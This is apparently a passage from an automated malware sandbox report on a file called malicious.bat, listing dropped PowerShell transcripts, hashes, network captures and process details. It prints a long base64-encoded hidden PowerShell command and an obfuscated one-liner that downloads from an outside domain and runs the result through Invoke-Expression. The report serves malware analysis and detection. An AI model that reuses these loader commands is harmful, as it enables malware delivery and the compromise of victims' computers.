                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20250421155937..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: CLIENT-OF9976 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAE
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (665), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4816
                                                    Entropy (8bit):5.542759309547369
                                                    Encrypted:false
                                                    SSDEEP:96:BZwMqNhlrEn8HT45O3SzUzo1Z3lrEn8HT45O3SVZNMqNhlrEn8HT45O3SzUzo1Z3:0rEn8HTwO3QrEn8HTwO30rEn8HTwO3qD
                                                    MD5:7146DEFD5986023D68F0F30213C22C4F
                                                    SHA1:D1101912BCCFF9687B4A88DE068403B2B0D9DEC1
                                                    SHA-256:CB9C0DF8948562932AC3707A7AFAF75C0149D61C7B1AB539C84B46083239BB81
                                                    SHA-512:F3E81354BE460F13386E33BA4B38493B0F4B39A55E9B9B1B3F6ADA7E4E79F8B6658779259D83F1DABFC8AB08E4CB8E00F90440A5ED8B748E054A3D6B8AC0EBA7
                                                    Malicious:false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20250421155938..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: CLIENT-OF9976 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)..Process ID: 4296..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (27108), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):38074
                                                    Entropy (8bit):4.687222465717669
                                                    Encrypted:false
                                                    SSDEEP:192:NSECjfdIkoNEfc5HXCgo7/l707A5CpNXo2B6AZdcrVC+LIfW9uv74mmZyLk:wBdu42B6AZdcrVC+LIfW9uv74mmZyLk
                                                    MD5:55A4ED230FA8DAEF54DD95CA2F274D43
                                                    SHA1:7703B2A36997A9FC33756549532684B21110FCE5
                                                    SHA-256:2CD2106B203591CFA06EF2A58FDB438F432824E5D4689FD8D035611779F5B28E
                                                    SHA-512:322793BBD3A14A9E4DBA24CFBABCE0F35786D70D6BED6DF5A1D830E36BBF617B6679A0D33B4D51D716469181A67876CE2793A1A3A4B30F095683350DCF30844B
                                                    Malicious:false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20250421155937..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: CLIENT-OF9976 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAH
                                                    File type:ASCII text, with very long lines (27108), with no line terminators
                                                    Entropy (8bit):3.857602594372497
                                                    TrID:
                                                      File name:malicious.bat
                                                      File size:27'108 bytes
                                                      MD5:693f86f667d508d9b9f3b8a00cdd1bb3
                                                      SHA1:127ab3dc1f6830d309db566178b36ccf05d46c6f
                                                      SHA256:59161a726bdcbab80697f632c77780d432cdaf0333eb9574172fd71a12a1c64e
                                                      SHA512:f9c5c0cc96cb3049a065e9fa4152ab883053ceb3159d8382b40caaa478ff9c94c4c0d4dfceaa38f24848b935b4f7fc64a8d84284bf8cf8e9930f17636ee1875f
                                                      SSDEEP:96:ne2SE/CvSiAD8dIkokmEO+cOfFk5RAqX25rV75h58FpZWFVqnHcl77wFVqnhUe52:fSECjfdIkoNEfc5HXCgo7/l707A5Cpj
                                                      TLSH:B0C2ECB8C53FBC09014AAAD516F7346854B6E03319B5D2F9FB822C98E172E4DFEB4484
                                                      File Content Preview:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQA
                                                      Icon Hash:9686878b929a9886

                                                      Download Network PCAP: filteredfull

                                                      • Total Packets: 10
                                                      • 443 (HTTPS)
                                                      • 53 (DNS)
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 21, 2025 21:59:40.283035994 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:40.283066988 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:40.283324003 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:40.289910078 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:40.289926052 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:40.525094032 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:40.525420904 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:40.529165983 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:40.529179096 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:40.529542923 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:40.536914110 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:40.577644110 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:41.067276955 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:41.119544983 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:41.180357933 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:41.180397987 CEST44349747172.67.212.124192.168.11.20
                                                      Apr 21, 2025 21:59:41.180486917 CEST49747443192.168.11.20172.67.212.124
                                                      Apr 21, 2025 21:59:41.181097984 CEST49747443192.168.11.20172.67.212.124
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 21, 2025 21:59:40.163518906 CEST6166953192.168.11.201.1.1.1
                                                      Apr 21, 2025 21:59:40.278258085 CEST53616691.1.1.1192.168.11.20
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 21, 2025 21:59:40.163518906 CEST192.168.11.201.1.1.10xd007Standard query (0)qqcxq1.dyheg.funA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 21, 2025 21:59:40.278258085 CEST1.1.1.1192.168.11.200xd007No error (0)qqcxq1.dyheg.fun172.67.212.124A (IP address)IN (0x0001)false
                                                      Apr 21, 2025 21:59:40.278258085 CEST1.1.1.1192.168.11.200xd007No error (0)qqcxq1.dyheg.fun104.21.16.124A (IP address)IN (0x0001)false
                                                      • qqcxq1.dyheg.fun
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.11.2049747172.67.212.1244434296C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-04-21 19:59:40 UTC120OUTGET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt HTTP/1.1
                                                      Host: qqcxq1.dyheg.fun
                                                      Connection: Keep-Alive
                                                      2025-04-21 19:59:41 UTC474INHTTP/1.1 404 Not Found
                                                      Date: Mon, 21 Apr 2025 19:59:40 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 193
                                                      Connection: close
                                                      X-Powered-By: Express
                                                      Content-Security-Policy: default-src 'none'
                                                      X-Content-Type-Options: nosniff
                                                      Cf-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      Set-Cookie: connect.sid=s%3AAvjgGrOay8d4iXYwUutebVYKUNI1fQVA.sjFiGZhpzt5Xj0xJqWxuSMo3dzAabzbphFz8KylaUPM; HttpOnly; Path=/
                                                      CF-RAY: 933f76977c2d438d-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-04-21 19:59:41 UTC193INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 37 37 32 31 39 37 32 65 62 38 65 31 30 30 64 36 39 32 33 64 31 34 61 34 31 37 33 65 38 66 31 34 34 37 38 35 38 31 38 62 62 61 65 63 61 37 62 39 2e 61 63 63 64 74 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt</pre></body></html>


                                                      Click to jump to process

                                                      Click to jump to process

                                                      • File
                                                      • Registry

                                                      Click to dive into process behavior distribution

                                                      Target ID:0
                                                      Start time:15:59:36
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" "
                                                      Imagebase:0x7ff684870000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:15:59:36
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6e6aa0000
                                                      File size:875'008 bytes
                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:15:59:36
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgA